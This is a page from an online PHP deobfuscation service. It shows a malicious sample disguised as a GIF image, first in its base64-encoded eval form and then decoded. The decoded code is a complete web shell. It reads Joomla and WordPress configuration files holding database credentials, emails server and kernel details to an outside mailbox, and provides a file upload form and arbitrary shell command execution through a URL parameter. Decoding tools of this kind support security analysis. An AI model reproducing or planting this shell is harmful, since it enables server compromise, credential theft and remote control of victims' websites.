Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

GIF89a<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO2lmKGlzc2V0KCRfR0VUWydqJ10pKXskcD..

Decoded Output download

error_reporting(0);if(isset($_GET['j'])){$p1="../../../../../../../";$p2="../../../../../../";$p3="../../../../../";$p4="../../../../";$p5="../../../";$p6="../../";$p7="../";$j=file_get_contents($p1."configuration.php");if(!$j){$j=file_get_contents($p2."configuration.php");if(!$j){$j=file_get_contents($p3."configuration.php");if(!$j){$j=file_get_contents($p4."configuration.php");if(!$j){$j=file_get_contents($p5."configuration.php");if(!$j){$j=file_get_contents($p6."configuration.php");if(!$j){$j=file_get_contents($p7."configuration.php");if(!$j){$j=file_get_contents("configuration.php");}}}}}}}echo $j;exit;}if(isset($_GET['w'])){$p1="../../../../../../../";$p2="../../../../../../";$p3="../../../../../";$p4="../../../../";$p5="../../../";$p6="../../";$p7="../";$w=file_get_contents($p1."wp-config.php");if(!$w){$w=file_get_contents($p2."wp-config.php");if(!$w){$w=file_get_contents($p3."wp-config.php");if(!$w){$w=file_get_contents($p4."wp-config.php");if(!$w){$w=file_get_contents($p5."wp-config.php");if(!$w){$w=file_get_contents($p6."wp-config.php");if(!$w){$w=file_get_contents($p7."wp-config.php");if(!$w){$w=file_get_contents("wp-config.php");}}}}}}}echo $w;exit;}if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $float = "From : vurl info <[email protected]>"; $aran = exec('uname -a;'); $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$inj." Via : ".$visitor."Kernel Version : ".$aran."Safe Mode : ".$safemode; mail("[email protected]","Setoran Bos ".$safemode,$body,$float);echo "<body style='background:#000;color:#64D300;font-size:14px;'>";echo "<title>-= R@crew =-</title><br>";echo "<b>".$secure."</b><br>";$cur_user="(".get_current_user().")";echo "<b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";echo "<b>Uname : ".php_uname()."</b><br>";echo "<form enctype=multipart/form-data action method=POST><b>Upload File</b><br><input type=hidden name=submit><input type=file name=userfile size=28><br><b>New name: </b><input type=text size=15 name=newname class=ta><input type=submit class=bt value=Upload></form>";if(isset($_POST['submit'])){$uploaddir=pwd();if(!$name=$_POST['newname']){$name=$_FILES['userfile']['name'];};move_uploaded_file($_FILES['userfile']['tmp_name'],$uploaddir.$name);echo(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploaddir.$name))?"!!Upload Failed":"Success Upload to ".$uploaddir.$name;}function pwd(){$cwd=getcwd();if($u=strrpos($cwd,'/')){return($u!=strlen($cwd)-1)?$cwd.'/':$cwd;}elseif($u=strrpos($cwd,'\/')){if($u!=strlen($cwd)-1){return $cwd.'\/';}else{return $cwd;}}}echo(isset($_GET['x']))?"<pre>".shell_exec($_GET['x'])."</pre>":"<pre>".shell_exec('ls -la')."</pre>";

Did this file decode correctly?

Original Code

GIF89a<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO2lmKGlzc2V0KCRfR0VUWydqJ10pKXskcDE9Ii4uLy4uLy4uLy4uLy4uLy4uLy4uLyI7JHAyPSIuLi8uLi8uLi8uLi8uLi8uLi8iOyRwMz0iLi4vLi4vLi4vLi4vLi4vIjskcDQ9Ii4uLy4uLy4uLy4uLyI7JHA1PSIuLi8uLi8uLi8iOyRwNj0iLi4vLi4vIjskcDc9Ii4uLyI7JGo9ZmlsZV9nZXRfY29udGVudHMoJHAxLiJjb25maWd1cmF0aW9uLnBocCIpO2lmKCEkail7JGo9ZmlsZV9nZXRfY29udGVudHMoJHAyLiJjb25maWd1cmF0aW9uLnBocCIpO2lmKCEkail7JGo9ZmlsZV9nZXRfY29udGVudHMoJHAzLiJjb25maWd1cmF0aW9uLnBocCIpO2lmKCEkail7JGo9ZmlsZV9nZXRfY29udGVudHMoJHA0LiJjb25maWd1cmF0aW9uLnBocCIpO2lmKCEkail7JGo9ZmlsZV9nZXRfY29udGVudHMoJHA1LiJjb25maWd1cmF0aW9uLnBocCIpO2lmKCEkail7JGo9ZmlsZV9nZXRfY29udGVudHMoJHA2LiJjb25maWd1cmF0aW9uLnBocCIpO2lmKCEkail7JGo9ZmlsZV9nZXRfY29udGVudHMoJHA3LiJjb25maWd1cmF0aW9uLnBocCIpO2lmKCEkail7JGo9ZmlsZV9nZXRfY29udGVudHMoImNvbmZpZ3VyYXRpb24ucGhwIik7fX19fX19fWVjaG8gJGo7ZXhpdDt9aWYoaXNzZXQoJF9HRVRbJ3cnXSkpeyRwMT0iLi4vLi4vLi4vLi4vLi4vLi4vLi4vIjskcDI9Ii4uLy4uLy4uLy4uLy4uLy4uLyI7JHAzPSIuLi8uLi8uLi8uLi8uLi8iOyRwND0iLi4vLi4vLi4vLi4vIjskcDU9Ii4uLy4uLy4uLyI7JHA2PSIuLi8uLi8iOyRwNz0iLi4vIjskdz1maWxlX2dldF9jb250ZW50cygkcDEuIndwLWNvbmZpZy5waHAiKTtpZighJHcpeyR3PWZpbGVfZ2V0X2NvbnRlbnRzKCRwMi4id3AtY29uZmlnLnBocCIpO2lmKCEkdyl7JHc9ZmlsZV9nZXRfY29udGVudHMoJHAzLiJ3cC1jb25maWcucGhwIik7aWYoISR3KXskdz1maWxlX2dldF9jb250ZW50cygkcDQuIndwLWNvbmZpZy5waHAiKTtpZighJHcpeyR3PWZpbGVfZ2V0X2NvbnRlbnRzKCRwNS4id3AtY29uZmlnLnBocCIpO2lmKCEkdyl7JHc9ZmlsZV9nZXRfY29udGVudHMoJHA2LiJ3cC1jb25maWcucGhwIik7aWYoISR3KXskdz1maWxlX2dldF9jb250ZW50cygkcDcuIndwLWNvbmZpZy5waHAiKTtpZighJHcpeyR3PWZpbGVfZ2V0X2NvbnRlbnRzKCJ3cC1jb25maWcucGhwIik7fX19fX19fWVjaG8gJHc7ZXhpdDt9aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAiT0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJvbSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycpOyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIiBWaWEgOiAiLiR2aXNpdG9yLiJLZXJuZWwgVmVyc2lvbiA6ICIuJGFyYW4uIlNhZmUgTW9kZSA6ICIuJHNhZmVtb2RlOyBtYWlsKCJ3b25kZXJzZXRvckBnbWFpbC5jb20iLCJTZXRvcmFuIEJvcyAiLiRzYWZlbW9kZSwkYm9keSwkZmxvYXQpO2VjaG8gIjxib2R5IHN0eWxlPSdiYWNrZ3JvdW5kOiMwMDA7Y29sb3I6IzY0RDMwMDtmb250LXNpemU6MTRweDsnPiI7ZWNobyAiPHRpdGxlPi09IFJAY3JldyA9LTwvdGl0bGU+PGJyPiI7ZWNobyAiPGI+Ii4kc2VjdXJlLiI8L2I+PGJyPiI7JGN1cl91c2VyPSIoIi5nZXRfY3VycmVudF91c2VyKCkuIikiO2VjaG8gIjxiPlVzZXIgOiB1aWQ9Ii5nZXRteXVpZCgpLiRjdXJfdXNlci4iIGdpZD0iLmdldG15Z2lkKCkuJGN1cl91c2VyLiI8L2I+PGJyPiI7ZWNobyAiPGI+VW5hbWUgOiAiLnBocF91bmFtZSgpLiI8L2I+PGJyPiI7ZWNobyAiPGZvcm0gZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhIGFjdGlvbiBtZXRob2Q9UE9TVD48Yj5VcGxvYWQgRmlsZTwvYj48YnI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9c3VibWl0PjxpbnB1dCB0eXBlPWZpbGUgbmFtZT11c2VyZmlsZSBzaXplPTI4Pjxicj48Yj5OZXcgbmFtZTogPC9iPjxpbnB1dCB0eXBlPXRleHQgc2l6ZT0xNSBuYW1lPW5ld25hbWUgY2xhc3M9dGE+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPWJ0IHZhbHVlPVVwbG9hZD48L2Zvcm0+IjtpZihpc3NldCgkX1BPU1RbJ3N1Ym1pdCddKSl7JHVwbG9hZGRpcj1wd2QoKTtpZighJG5hbWU9JF9QT1NUWyduZXduYW1lJ10peyRuYW1lPSRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXTt9O21vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyd1c2VyZmlsZSddWyd0bXBfbmFtZSddLCR1cGxvYWRkaXIuJG5hbWUpO2VjaG8obW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ3RtcF9uYW1lJ10sJHVwbG9hZGRpci4kbmFtZSkpPyIhIVVwbG9hZCBGYWlsZWQiOiJTdWNjZXNzIFVwbG9hZCB0byAiLiR1cGxvYWRkaXIuJG5hbWU7fWZ1bmN0aW9uIHB3ZCgpeyRjd2Q9Z2V0Y3dkKCk7aWYoJHU9c3RycnBvcygkY3dkLCcvJykpe3JldHVybigkdSE9c3RybGVuKCRjd2QpLTEpPyRjd2QuJy8nOiRjd2Q7fWVsc2VpZigkdT1zdHJycG9zKCRjd2QsJ1wvJykpe2lmKCR1IT1zdHJsZW4oJGN3ZCktMSl7cmV0dXJuICRjd2QuJ1wvJzt9ZWxzZXtyZXR1cm4gJGN3ZDt9fX1lY2hvKGlzc2V0KCRfR0VUWyd4J10pKT8iPHByZT4iLnNoZWxsX2V4ZWMoJF9HRVRbJ3gnXSkuIjwvcHJlPiI6IjxwcmU+Ii5zaGVsbF9leGVjKCdscyAtbGEnKS4iPC9wcmU+Ijs=')); ?>

Function Calls

base64_decode

Variables

None

Stats

MD5	e364af315ac41bef3ba93352668c9656
Eval Count	1
Decode Time	115 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats